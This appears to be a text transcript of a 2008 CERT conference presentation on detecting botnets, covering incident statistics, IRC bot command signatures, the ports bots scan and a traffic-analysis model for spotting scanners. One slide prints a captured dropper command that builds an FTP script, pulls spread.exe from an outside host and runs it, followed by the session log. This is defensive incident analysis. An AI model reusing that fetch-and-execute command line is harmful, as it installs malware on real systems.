china science & technology network computer emergency response team botnet detection and network...
TRANSCRIPT
China Science & Technology Network Computer Emergency Response Team
Botnet Detection Botnet Detection and and
Network Security AlertNetwork Security AlertTao JING
[email protected],CNIC
(+86)-010-58812898
CANS 2008 Indiana University2008-10-21
China Science & Technology Network Computer Emergency Response Team
Agenda
• About CSTCERT• About Botnet• Network Security Alert• Future work
China Science & Technology Network Computer Emergency Response Team
CSTCERT Overview• Founded in 2002 , CSTCERT(China Science
and Technology Network Computer Emergency Response Team)
• CSTCERT is supervised by CSTNET.• Services:
– Incidents handling, include: attack ,complaints , abnormal traffic detect and other related security incidents
– research and development :• Emergency Response
– Security training : http://cert.cstnet.cn :+86-010-58812935 : [email protected]
China Science & Technology Network Computer Emergency Response Team
port scanni ng55%Brute f orce
29%
phi shi ng cheat9%
SQL I nj ect i on5%
address probe2%
Our work
• 2007.9 -2008.9 ,we have handled 266 security events.– security
incidents:205– security
complaints :61
China Science & Technology Network Computer Emergency Response Team
Security status is very serious!-why?• You can become a
hacker very easily!– Know a little
knowledge– Search hacker method
from Internet– Many people share
their hacker tools– If you want to pay
some money, someone will teach you about hacker-tech.
China Science & Technology Network Computer Emergency Response Team
About Botnet• A botnet is a collection of computers, connected to the
internet, that interact to accomplish some distributed task.• Botnet typically refers to such a system designed and used
for illegal purposes.• The compromised machines are referred to as drones or
zombies, the malicious software running on them as 'bot'.
From: www.shadowserver.org
China Science & Technology Network Computer Emergency Response Team
Botnet can cause ?
and 。。。
China Science & Technology Network Computer Emergency Response Team
How can we find Botnet?
• Active way:– Network protocol analysis
• IRC ()– monitor some special TCP
port(135/139/445/1433/22/2967……)– Check C&C(Command and Control Center)
server address update from internet• http://www.cyber-ta.org/• http://www.shadowserver.org
• Passive way:– honeypot
China Science & Technology Network Computer Emergency Response Team
China Science & Technology Network Computer Emergency Response Team
Main Character of Botnet
• IRC message– Port scan:advscan, asc…– File download:download– Others: ping/pong,join,mode…
• scan tcp port:135/139/445/1433/22/2967• Vulnerability that botnet always exploit
– Weak password (ssh/MS-SQL/windows)– Overflow
vulnerability(MS-SQL/windows/software)
China Science & Technology Network Computer Emergency Response Team
the host was controled by this method-1Sometimes-use scan control command
China Science & Technology Network Computer Emergency Response Team
the host was controled by this method-2Sometimes-install malware
China Science & Technology Network Computer Emergency Response Team
China Science & Technology Network Computer Emergency Response Team
C:\Documents and Settings\jackie>cmd /c echo open spreadem.nowslate1703.info 21>appmr.dll &echo user spread baby >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo spread.exe >>appmr.dll &echo spread.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &spread.exeftp> open spreadem.nowslate1703.info 21Connected to spreadem.nowslate1703.info.220---------- Welcome to Pure-FTPd [TLS] ----------220-You are user number 73 of 200 allowed.220-Local time is now 00:15. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 2 minutes of inactivity.ftp> user spread baby331 User spread OK. Password required230-User spread has group access to: spread230 OK. Current restricted directory is /ftp> binary200 TYPE is now 8-bit binaryftp> getRemote file spread.exeLocal file spread.exe200 PORT command successful150-Connecting to port 1555150 83.1 kbytes to download226-File successfully transferred226 0.750 seconds (measured here), 110.70 Kbytes per secondftp: 85057 bytes received in 1.50Seconds 56.70Kbytes/sec.ftp> bye221-Goodbye. You uploaded 0 and downloaded 84 kbytes.221 Logout.C:\Documents and Settings\jackie>
China Science & Technology Network Computer Emergency Response Team
Network security alertNetwork security alert -IDS/IPS rule• For port scan:Use some IRC
message word:asc/advscan • for network comunication with IRC:
Ping/Pong,JOIN,PRIVMSG ……
China Science & Technology Network Computer Emergency Response Team
Rules for IDS
China Science & Technology Network Computer Emergency Response Team
Network security alertNetwork security alert -Network traffic data analysis• We can build a simple mathematics model to
describe Network Traffic data by Numerical Analysis method (NTNA model)
21 wn
nw
c
cp
all
i
all
i
pw
n
n
c
c
p
i
all
i
all
i
in unit forward for the degreeeffect ofweight :
portn destinatio special for this amounts ip target unique theof all:
src_ip :ip source same thehas ip target theall
port,n destinatio special for this amounts ip target unique:
portn destinatio specil for thiscount theof all:
portn destinatio special for this src_ip thisofcount :
scanning is src_ip s think thiy that weprobabilit:
i
i
i
)...,...( 2121 nallnall nnnncccc
China Science & Technology Network Computer Emergency Response Team
Data of tcp 1433 scan
Data of tcp 22 scan
Data of other port scan
。。。。。。
data of src ip data of counts amounts of target ip
Count_1
Count_2
。。。
Count_n
Count_1
Count_2
。。。
Count_n
Dst_ipsum_1
Dst_ipnsum_2
。。。
Dst_ipsum_n
Dst_ipsum_1
Dst_ipnsum_2
。。。
Dst_ipsum_n
Src_ip1
Src_ip2
。。。
Src_ipn
Src_ip1
Src_ip2
。。。
Src_ipn
China Science & Technology Network Computer Emergency Response Team
NTNA model in practice
China Science & Technology Network Computer Emergency Response Team
Future work
• Botnet research• Monitoring and countermeasure
for large-scale network worm • Some improvement for the NTNA
model
– accuracy amendment– Extension to larger scale network
traffic data (netflow) – Data mining
China Science & Technology Network Computer Emergency Response Team
Thank you!
(+86)-010-58812898